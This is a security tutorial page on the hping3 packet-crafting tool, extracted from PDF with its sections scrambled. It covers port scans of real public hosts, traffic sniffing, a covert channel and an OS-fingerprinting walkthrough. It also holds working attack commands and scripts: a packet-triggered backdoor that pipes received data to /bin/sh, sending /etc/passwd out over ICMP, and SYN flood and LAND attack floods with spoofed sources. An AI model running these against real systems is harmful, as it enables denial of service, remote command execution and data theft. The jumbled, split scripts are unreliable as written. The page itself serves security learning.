hping | research | sprawl

http://www.thesprawl.org/research/hping/

THE SPRAWL
search...

journal research projects simstim

researchhping
port scanning , denial of service , backdoor , covert channel , hping , host discovery , os fingerprinting hping is a TCP/IP packet forging tool with embedded Tcl scripting functionality. Developed by antirez in 1998, it is now in its 3rd release. The tool runs on all major operatings systems including Linux, *BSD, and Windows.
--- 72.14.207.99 hping statistic --1 packets transmitted, 1 packets received, 0% packet loss round-trip min/avg/max = 266.4/266.4/266.4 ms

Table of Contents
Port Scanning TCP SYN Scan TCP ACK Scan Other TCP Scans UDP Scans IP Scan Host Discovery ICMP Ping TCP Ping UDP Ping OS Fingerprinting Initial Sequence Number Sniffer Backdoor File Transfer Covert Channel Flooding Fuzzing Traceroute Firewall/IDS Testing TCP Timestamp Filtering Local Privilege Escalation External Links

This will scan port 80 on Google. As we can see from the output returned packet from Google contains SYN and ACK flags set which indicates an open port. In order to scan a range of ports starting from port 80 and up use the following command line:
hping3 -S 4.2.2.1 -p ++50

The ++ prefix will increment port number each subsequent packet sent to the target.
HPING 4.2.2.1 (eth1 4.2.2.1): S set, bytes len=46 ip=4.2.2.1 ttl=56 DF id=32839 seq=0 win=0 rtt=264.3 ms len=46 ip=4.2.2.1 ttl=56 DF id=32840 seq=1 win=0 rtt=277.6 ms len=46 ip=4.2.2.1 ttl=56 DF id=32841 seq=2 win=0 rtt=285.4 ms len=46 ip=4.2.2.1 ttl=56 DF id=32842 seq=3 win=49312 rtt=270.7 ms len=46 ip=4.2.2.1 ttl=56 DF id=32843 seq=4 win=0 rtt=225.1 ms len=46 ip=4.2.2.1 ttl=56 DF id=32844 seq=5 win=0 rtt=202.6 ms len=46 ip=4.2.2.1 ttl=56 DF id=32845 seq=6 win=0 rtt=196.7 ms 40 headers + 0 data sport=50 flags=RA sport=51 flags=RA sport=52 flags=RA sport=53 flags=SA sport=54 flags=RA sport=55 flags=RA sport=56 flags=RA

--- 4.2.2.1 hping statistic --7 packets transmitted, 7 packets received, 0% packet loss round-trip min/avg/max = 196.7/246.1/285.4 ms

Port Scanning
hping gives you complete freedom to craft any raw IP, TCP, UDP, and ICMP packets. With such powerful capability we can proceed to replicate most of the standard scan types:

From the output above we can see that the majority of probes returned RST packets indicating that all of these ports are closed. Only probe directed at port 53 returned SYN ACK thus suggesting an open port. While this method is acceptable for a short range of ports, looking through thousands of responses is hard. The simplest solution to this problem is to use grep to only display interesting responses:
hping3 -S 4.2.2.1 -p ++50 | grep SA

TCP SYN Scan

The simplest way to initiate a classic TCP SYN Scan is to use the following command line options:
hping3 -S 72.14.207.99 -p 80 -c 1

However, you will quickly discover that using hping in such a way is cumbersome. With this in mind new scanning facilities were implemented which are called with -8 or --scan flags:
hping3 -8 50-56 -S 4.2.2.1

NOTE: I had to use -c 1 flag in order to send the SYN packet only once, otherwise hping will continue sending probes. This will produce the following output:
HPING 72.14.207.99 (eth1 72.14.207.99): S set, 40 headers + 0 data bytes len=46 ip=72.14.207.99 ttl=244 id=64932 sport=80 flags=SA seq=0 win=8190 rtt=266.4 ms

With the scan flag we have a much more flexible way to specify ports. For example, we can use comma separated values 50-56,80 special keywords known and all, and even negation 50,56,!known. As for the scan above, it produces the following output:
Scanning 4.2.2.1 (4.2.2.1), port 50-56 7 ports to scan, use -V to see all the replies +----+-----------+---------+---+-----+-----+ |port| serv name | flags |ttl| id | win |

1 de 6

23/03/2012 13:54

hping | research | sprawl

http://www.thesprawl.org/research/hping/

+----+-----------+---------+---+-----+-----+ 53 domain : .S..A... 56 31099 49312 All replies received. Done. Not responding ports:

} set outifaddr [hping outifa $targetip] set outifname [outifname $targetip] hping setfilter $outifname "tcp and host $targetip" set source_port [expr int(rand()*65536)] proc send_probe {} { after 1000 send_probe global outifaddr targetip start_port end_port source_port send_flag return_flag if {$start_port > $end_port} exit append probe "ip(saddr=$outifaddr,daddr=$targetip,ttl=255)+" append probe "tcp(sport=$source_port,dport=$start_port,flags=$send_fla g,win=4096)" hping send $probe incr start_port } proc recv_probe {} { global outifname outifaddr targetip start_port end_port source_port send_flag return_flag set packets [hping recv $outifname 0 1000] foreach p $packets { if {[GetIpSaddr $p] != $targetip} continue if {[GetIpDaddr $p] != $outifaddr} continue if {[GetApdField tcp flags $p] ====== $return_flag} { puts " Port [GetTcpSport $p] is open" } } after 10 recv_probe } puts "Scanning $target ($targetip), $start_port-$end_port" hping after after vwait recv $outifname 0 10 send_probe idle recv_probe forver

While the scanning mode of hping is very convenient, it does produce some packets useful for information collection but not for simple port discovery. Here is a packet trace for the above scan just for port 53:
# hping sends three SYN probes at once to target host 0.000000 192.168.1.100 -> 4.2.2.1 TCP 2268 > domain [SYN] Seq=0 Len=0 0.002677 192.168.1.100 -> 4.2.2.1 TCP 2268 > domain [SYN] Seq=2573678699 Len=0 0.004275 192.168.1.100 -> 4.2.2.1 TCP 2268 > domain [SYN] Seq=4285036453 Len=0 # target responds once saying that it is open 0.336498 4.2.2.1 -> 192.168.1.100 TCP domain > 2268 [SYN, ACK] Seq=3335179574 Ack=1 Win=49312 Len=0 MSS=1460 0.336528 192.168.1.100 -> 4.2.2.1 TCP 2268 > domain [RST] Seq=1 Len=0 # target responds again to the same probe 0.338791 4.2.2.1 -> 192.168.1.100 TCP [TCP Dup ACK 4#1] domain > 2268 [ACK] Seq=3335179575 Ack=1 Win=49312 Len=0 0.338809 192.168.1.100 -> 4.2.2.1 TCP 2268 > domain [RST] Seq=1 Len=0 # and again... 0.340180 4.2.2.1 -> 192.168.1.100 TCP [TCP Dup ACK 4#2] domain > 2268 [ACK] Seq=3335179575 Ack=1 Win=49312 Len=0 0.340190 192.168.1.100 -> 4.2.2.1 TCP 2268 > domain [RST] Seq=1 Len=0

While all of the above examples use hping's command line features, since the introduction of hping3 there is a powerful Tcl based scripting facility implemented in the tool. You can access the interactive mode of hping by simply typing hping3 with no other options. You should be presented with the following prompt:
hping3>

To initiate a simple SYN scan on Google's port 80 type in the following:

hping3> hping send "ip(saddr=192.168.1.100,daddr=72.14.207.99,ttl=255)+tcp(s port=666,dport=80,flags=s)"

The above script illustrates the potential for custom scan development. It can be executed with the following command line:
hping3 exec tcpscan.htcl google.com 79 81 SYN

In the above example we are specifying a complete TCP packet using Ars Packet Description (APD) format. We did not specify every single IP and TCP option, because hping is capable of filling them in automatically. However, here is an example of a completely specified APD packet:
ip(ihl=0x5,ver=0x4,tos=0x00,totlen=52,id=28880,fragoff=0, mf=0,df=1,rf=0,ttl=64,proto=6,cksum=0x5bbe,saddr=192.168. 1.100,\ daddr=72.14.207.99)+tcp(sport=666,dport=80,seq=1804471615 ,ack=3634589598,x2=0x0,off=8,flags=a,win=62694,cksum=0xda 46,urp=0)\ +tcp.nop()+tcp.nop()+tcp.timestamp(val=54111314,ecr=10490 55856)

NOTE: Make sure hpingstdlib.htcl is somewhere in path (it comes with hping3 source files) The above script produces the following output:
Scanning google.com (64.233.187.99), 79-81 Port 80 is open

TCP ACK Scan

TCP ACK Scan can be performed by setting ACK flag in probe packets:
hping3 -A 72.14.207.99 -p 80 -c 1

To scan multiple ports, a simple Tcl loop must be implemented:

hping3> for {set i 79} {$i<82} {incr i} { hping send "ip(saddr=192.168.1.100,daddr=72.14.207.99,ttl=255)+tcp(s port=666,dport=$i,flags=s)" }

Scripted execution can be performed just like in previous examples:

hping3> hping send "ip(saddr=192.168.1.100,daddr=72.14.207.99,ttl=255)+tcp(s port=666,dport=80,flags=a)"

The above command will scan ports 79-81 on Google. It makes sense to implement the above as a separate Tcl script for future use:
source "hpingstdlib.htcl" if {$argc < 4} { puts {usage: hping3 exec tcpscan.htcl hostname start_port end_port [SYN|ACK]} exit 1 } set target [lindex $argv 0] set targetip [hping resolve $target] set start_port [lindex $argv 1] set end_port [lindex $argv 2] set scan_type [lindex $argv 3] if {[string toupper $scan_type] ====== "SYN"} { set send_flag "s" set return_flag "sa" } elseif {[string toupper $scan_type] ====== "ACK"} { set send_flag "a" set return_flag "r"

And at last tcpscan.htcl in the previous section can be used to perform ACK Scan with the following command line:
hping3 exec tcpscan.htcl slashdot.org 79 81 ACK

NOTE: Google sends RST to all unknown ports, ACK Scan will fail. However, slashdot responds as it should according to RFCs ;-)

Other TCP Scans

Just like previously discussed scan types, we can construct other common and custom types using different flags available in hping3. For TCP Scan the following parameters can be used:

2 de 6

23/03/2012 13:54

hping | research | sprawl

http://www.thesprawl.org/research/hping/

Command Line Script -S or --syn -A or --ack -R or --rst -F or --fin -P or --push -U or --urg -X or --xmas -Y or --ymas

Description

flags=s SYN flags=a ACK flags=r flags=f RST FIN

set packets [hping recv $outifname 0 1000] foreach p $packets { if {[GetIpSaddr $p] != $targetip} continue if {[GetIpDaddr $p] != $outifaddr} continue puts "Response TYPE: [GetIcmpType $p]] CODE: [GetIcmpCode $p] ID: [GetIcmpId $p]" } after 10 recv_probe } puts "Scanning $target ($targetip)" hping after after vwait recv $outifname 0 10 send_probe idle recv_probe forver

flags=p PUSH flags=u URG flags=x Xmas flags=y Tmas

With the above table in mind we can easily create XMas Scan:
hping3 -F -P -U 72.14.207.99 -p 80 -c 1

Host Discovery
For all the different types of host discovery mechanisms, hping has only limited facilities to scan multiple targets from the command line (there is obviously no such limitation when scripting the task). In order to scan a range of IP addresses you may use //x// character to be replaced by hping with a random number. For example, the following command will scan entire class C LAN range:
hping3 -1 192.168.1.x --rand-dest -I eth0

or inside the script:

hping3> hping send "ip(saddr=192.168.1.100,daddr=72.14.207.99,ttl=255)+tcp(s port=666,dport=80,flags=fpu)"

To perform a Null Scan, simply leave out all flags from sent probes:
hping3 72.14.207.99 -p 80 -c 1

ICMP Ping UDP Scans

You can perform an ICMP Ping with the following command: hping can be configured to operate in UDP mode by specifying -2 in the command line. Below is an example of a classic UDP Port Unreachable Scan:
hping3 -2 192.168.1.1 -p 80 -c 1 hping3 -1 192.168.1.1

To send ICMP probe of different type such as Timestamp request:

hping3 -1 192.168.1.1 -C 13

The above scan would generate output:

HPING 192.168.1.1 (eth1 192.168.1.1): udp mode set, 28 headers + 0 data bytes ICMP Port Unreachable from ip=192.168.1.1 get hostname... --- 192.168.1.1 hping statistic --1 packets transmitted, 0 packets received, 100% packet loss round-trip min/avg/max = 0.0/0.0/0.0 ms

There are abbreviations for two common ICMP tyles: --icmp-ts equivalent to -C 13 (Timestamp request) --icmp-addr equivalent to -C 17 (Address mask request) Interactive mode can be used to produce similar results:
hping3> hping send "ip(daddr=192.168.1.1)+icmp(type=8)"

You can also use the following string in interactive mode:

hping3> hping send "ip(saddr=192.168.1.100,daddr=192.168.1.1,ttl=255)+udp(sp ort=666,dport=80)"

hping3 comes a complete implementation of ICMP Ping (Echo based) in //lib// directory:
hping3 exec ping.htcl 192.168.1.1

IP Scan TCP Ping

You can use hping to perform an IP Scan on the target in order to enumerate supported protocols. Use the following script to perform the scan:
source "hpingstdlib.htcl" if {$argc < 1} { puts {usage: hping3 exec ipscan.htcl hostname} exit 1 } set target [lindex $argv 0] set targetip [hping resolve $target] set outifaddr [hping outifa $targetip] set outifname [outifname $targetip] set ip_proto 1; hping setfilter $outifname "icmp and host $targetip" proc send_probe {} { after 100 send_probe global outifaddr targetip ip_proto if {$ip_proto > 255} exit append probe "ip(saddr=$outifaddr,daddr=$targetip,proto=$ip_proto,ttl= 255)" hping send $probe incr ip_proto } proc recv_probe {} { global outifname outifaddr targetip

Various types of TCP Pings can be sent by using standard TCP flags. For example, to send a TCP SYN Ping to port 80:
hping3 -S 192.168.1.1 -p 80

and here is an example of Xmas Ping:

hping3 -F -P -U 192.168.1.1 -p 0

UDP Ping
UDP Ping can be built using the following command:
hping3 -2 192.168.1.1 -p 0

the following script command will produce similar results:

hping3> hping send "ip(saddr=192.168.1.100,daddr=192.168.1.1,ttl=255)+udp(sp ort=666,dport=0)"

OS Fingerprinting
Initial Sequence Number
hping proves several ways to collect ISNs and determine their increments. The simplest one is to use -Q or --seqnum:

3 de 6

23/03/2012 13:54

hping | research | sprawl

http://www.thesprawl.org/research/hping/

hping3 192.168.1.103 -Q -p 139 -S HPING 192.168.1.103 (eth1 192.168.1.103): S set, 40 headers + 0 data bytes 1122514315 +1122514315 1122772104 +257789 1123051866 +279762 1123339049 +287183 1123650435 +311386 1123929718 +279283 1124215445 +285727 --- 192.168.1.103 hping statistic --7 packets transmitted, 7 packets received, 0% packet loss round-trip min/avg/max = 0.2/2.1/10.9 ms

close $io set packet "ip(saddr=[hping getfield ip daddr $p],daddr=[hping getfield ip saddr $p],ttl=255)+" append packet "tcp(sport=[hping getfield tcp sport $p],dport=[hping getfield tcp dport $p],flags=r)+" append packet "data(str=$output)" hping send $packet } }

You can execute the above with the following parameters:

hping3 exec backdoor.htcl secret

There is also a powerful script to generate a spectrogram of ISN increments:

hping3 exec isn-spectrogram.htcl 192.168.1.103 100 135

Now with the backdoor running on 192.168.1.100, we can execute on remote machine:
hping3 -R 192.168.1.100 -e secretcal -c 1

This will produce the following graph for a Windows XP box:

{{:tools:isn-spectrogram.png|}}

Here is a packet trace for the above request:

No. Time Destination 3 0.000155 192.168.1.100 0000 00 00 00 11 ..............E. 0010 00 31 14 fd [email protected].. 0020 01 64 0a 01 .d....3...iRu.P. 0030 02 00 32 f0 ..2...secretcal Source Protocol Info 192.168.1.109 TCP 2561 > 0 [RST] Seq=0 Len=9 11 11 00 00 00 22 22 22 08 00 45 00 00 00 40 06 e1 a8 c0 a8 01 6d c0 a8 00 00 33 c1 ce 1f 69 52 75 e3 50 04 00 00 73 65 63 72 65 74 63 61 6c

Sniffer
Using hping's listening modes we can intercept and save all traffic going through our machine's network interface. For example, to intercept all traffic containing HTTP signature the following command can be used:
hping3 -9 HTTP -I eth0

Note: Each packet will have initial HTTP cut off due to the way hping's signature works Or even better, intercept all google search queries:
hping3 -9 "http://www.google.com/search?" --beep -I eth0

Backdoor script will match "secret" keyword and execute cal command after it. Output will be sent back as a reset packet. Here is a packet trace the response:
No. Time Destination 4 0.006076 192.168.1.109 Len=168 Source Protocol Info 192.168.1.100 TCP 2561 > 0 [RST] Seq=0

Tcl must be used for more advanced display of captured information. To display all traffic capture on the wire:
hping3> while 1 { set p [lindex [hping recv eth1] 0] puts "[hping getfield data str $p]" }

We can even show tcpdump like output:

hping3> while 1 { set p [lindex [hping recv eth1] 0] puts "[hping getfield ip saddr $p] -> [hping getfield ip daddr $p]" }

Backdoor
Further expanding on hping's listening feature, we can pipe receiving packets to /bin/sh in order to create a simple backdoor:
hping3 -I eth1 -9 secret | /bin/sh

Backdoor can now be used by crafting packets destined at the host which contain signature (secret) followed by executable command stored in //commands_file// (cal; must add semi-column for /bin/sh to execute):
hping3 -R 192.168.1.100 -e secret -E commands_file -d 100 -c 1

0000 00 00 00 22 22 22 ..............E. 0010 00 d0 ea d5 00 00 ........L0...d.. 0020 01 6d 0a 01 00 00 .m............P. 0030 00 00 ff af 00 00 ...... Septemb 0040 65 72 20 32 30 30 er 2007 .Su Mo 0050 20 54 75 20 57 65 Tu We Th Fr Sa. 0060 20 20 20 20 20 20 20 0070 20 20 20 31 0a 20 35 1. 2 3 4 5 0080 20 20 36 20 20 37 20 6 7 8. 9 10 0090 31 31 20 31 32 20 11 12 13 14 15.1 00a0 36 20 31 37 20 31 6 17 18 19 20 21 00b0 20 32 32 0a 32 33 22.23 24 25 26 00c0 32 37 20 32 38 20 27 28 29.30 00d0 20 20 20 20 20 20 0a

00 00 00 11 11 11 08 00 45 00 ff 06 4c 30 c0 a8 01 64 c0 a8 00 00 00 00 00 00 00 00 50 04 20 20 20 53 65 70 74 65 6d 62 37 20 20 20 0a 53 75 20 4d 6f 20 54 68 20 46 72 20 53 61 0a 20 20 20 20 20 20 20 20 20 32 20 20 33 20 20 34 20 20 20 20 38 0a 20 39 20 31 30 31 33 20 31 34 20 31 35 0a 31 38 20 31 39 20 32 30 20 32 31 20 32 34 20 32 35 20 32 36 20 32 39 0a 33 30 20 20 20 20 20 20 20 20 20 20 20 20 .

While command line offers only rudimentary backdoor functionality, we can improve by writing our own backdoor script:
if {$argc < 1} { puts {usage: hping3 exec backdoor.htcl secret} exit 1 } set secret [lindex $argv 0] while 1 { set p [lindex [hping recv eth1] 0] set data [hping getfield data str $p] if {[string match $secret* $data]} { set cmd [string map "$secret {}" $data] set output "" set io [ open |$cmd ] while { [gets $io line] >= 0 } { append output "$line\n"}

We can clearly see cal output embedded inside TCP RST packet. Further modifications/additions can be made to only accept command requests from a set of ips with certain flags, parameters, etc.

File Transfer
Instead of transferring separate commands we can transfer complete files using hping. Here is how to set up the receiving end:
hping3 -1 192.168.1.100 -9 signature -I eth0

And here is the sending part:

hping3 -1 192.168.1.101 -e signature -E /etc/passwd -d 2000

Note: Set proper file size with -d flag, hping will automatically fragment. I was not able to transmit files with --safe flag.

4 de 6

23/03/2012 13:54

hping | research | sprawl

http://www.thesprawl.org/research/hping/

Covert Channel
With the power of crafting virtually any IP packet, we can establish a covert communication channel only using IP Protocol ids which are 8bit values just like ASCII. This script will be split into receiving and sending parts.
source "hpingstdlib.htcl" if {$argc < 2} { puts {usage: hping3 exec covert-send.htcl hostname message} exit 1 } set target [lindex $argv 0] set targetip [hping resolve $target] set outifaddr [hping outifa $targetip] set outifname [outifname $targetip] set message [lindex $argv 1] foreach c [split $message {}] { set v 0; scan $c %c v; hping send "ip(saddr=$outifaddr,daddr=$targetip,proto=$v,ttl=255)+da ta(str=redflag)" }

Traceroute
Basic UDP traceroute can be emulated using the following command:
hping3 -2 4.2.2.1 -p ++44444 -T -n HPING 4.2.2.1 (eth1 4.2.2.1): udp mode set, 28 headers + 0 data bytes hop=1 TTL 0 during transit from ip=192.168.1.1 hop=1 hoprtt=0.5 ms 3: hop=3 TTL 0 during transit from ip=68.88.88.88 hop=3 hoprtt=12.2 ms hop=4 TTL 0 during transit from ip=68.89.89.89 hop=4 hoprtt=10.7 ms hop=5 TTL 0 during transit from ip=4.79.43.134 hop=5 hoprtt=10.7 ms hop=6 TTL 0 during transit from ip=4.79.43.133 hop=6 hoprtt=9.0 ms hop=7 TTL 0 during transit from ip=4.68.18.126 hop=7 hoprtt=29.9 ms hop=8 TTL 0 during transit from ip=4.68.123.38 hop=8 hoprtt=12.3 ms ICMP Port Unreachable from ip=4.2.2.1 ICMP Port Unreachable from ip=4.2.2.1 ...

Similarly TCP traceroute can be launced with the following:

hping3 -S 4.2.2.1 -p 53 -T

Using the above script the actual message is converted to numerical ASCII equivalent so you can not immediately see the message. However, you will see a lot of ICMP Protocol Unreachable message coming from a freaked out machine + the "redflag" message transmitted in cleartext. Here the receiving portion of covert channel:
while 1 { set p [lindex [hping recv eth1] 0] set data [hping getfield data str $p] if {[string match redflag* $data]} { puts [ format %c [hping getfield ip proto $p] ] } }

Note: if hping gets stuck on any given hop simple press CTRL-Z in order to skip unresponsive hop. In order to observe how the route changes at different hops, we can fix the TTL value. For example, when pinging Google we can see how routes change on hop 15:
hping3 -S 64.233.167.99 -p 80 -T --ttl 15 --tr-keep-ttl -n HPING 64.233.167.99 (eth1 64.233.167.99): S set, 40 headers + 0 data bytes hop=15 TTL 0 during transit from ip=66.249.94.133 hop=15 hoprtt=64.7 ms hop=15 TTL 0 during transit from ip=66.249.94.133 hop=15 hoprtt=90.5 ms hop=15 TTL 0 during transit from ip=72.14.232.53 hop=15 hoprtt=63.9 ms hop=15 TTL 0 during transit from ip=72.14.232.53 hop=15 hoprtt=61.6 ms

Below is a sample packet trace for the message "hping"

0.000000 192.168.1.100 # h (0x68) 0.000376 192.168.1.100 (v7) # p 0.000510 192.168.1.100 (0x69) # i 0.000640 192.168.1.100 (0x6e) # n 0.000770 192.168.1.100 Unknown # g -> 192.168.1.1 -> 192.168.1.1 -> 192.168.1.1 -> 192.168.1.1 -> 192.168.1.1 IP ARIS VRRP Announcement IP SCPS IP Compaq Peer PIMv7

Firewall/IDS Testing
TCP Timestamp Filtering
Many firewalls include a rule to drop TCP packets that do not have TCP Timestamp option set which is a common occurrence in popular port scanners. Simply add --tcp-timestamp option to append timestamp information:
hping3 -S 72.14.207.99 -p 80 --tcp-timestamp

Flooding
Here is an example of a classic [[attacks:syn_flood]] targeting 192.168.1.1:
hping3 -S 192.168.1.1 -a 192.168.1.254 -p 22 --flood

Local Privilege Escalation

a Notice that any shell commands can be executed from hping3> command prompt. If hping3> is running with root privileges then all shell commands will be executed as root.
hping3> id uid=0(root) gid=0(root) groups=0(root)

Using the above example [[attacks::land_attack]]:

it

is

trivial

to

construct

hping3 -S 192.168.1.101 -a 192.168.1.101 -k -s 135 -p 135 --flood

A variation on the above is Remote LAND Attack, where a target router's external and internal IPs are used:
hping3 -A -S -P -U 66.66.66.66 -k -s 80 -p 80 -a 192.168.1.1

External Links
http://www.hping.org http://wiki.hping.org http://www.ethicalhacker.net/content/view/72/24/

Fuzzing sprawlsimilar
nmap
port scanning, host discovery, os fingerprinting, firewall, nmap, ids nmap (Network MAPper) is a network port scanner with service version

scapy
udp, icmp, ack, syn, tcp, port scanning, host discovery, os fingerprinting, wireless, sniffing, scapy

5 de 6

23/03/2012 13:54

hping | research | sprawl

http://www.thesprawl.org/research/hping/

and operating system detection engines. The tool was originally developed by Fyodor and published in Phrack Issue 51 in 1997. The tool is command line although a number of GUIs exist. nmap runs on a variety of platforms including Linux, *BSD, Windows, and others. Read more.

Scapy is a packet forging tool using Python as its domain specific language. It was developed by Philippe Biondi in 2003. Read more.

port scanning
udp, icmp, ack, ip, syn, tcp, null, fin, xmas, ftp, networking, scanning, port scanning, idlescan, reconnaissance Discovering open ports on a networked system is an important reconnaissance step used to enumerate potentially vulnerable services. In this article you will learn a number of techniques used to perform fast and reliable port scans while bypassing many trivial defenses. Read more.

denial of service
syn, denial of service, land A Denial of Service (DoS) attack is designed to prevent legitimate access to a target system. This article will cover techniques used to DoS a machine or service. Read more.

6 de 6

23/03/2012 13:54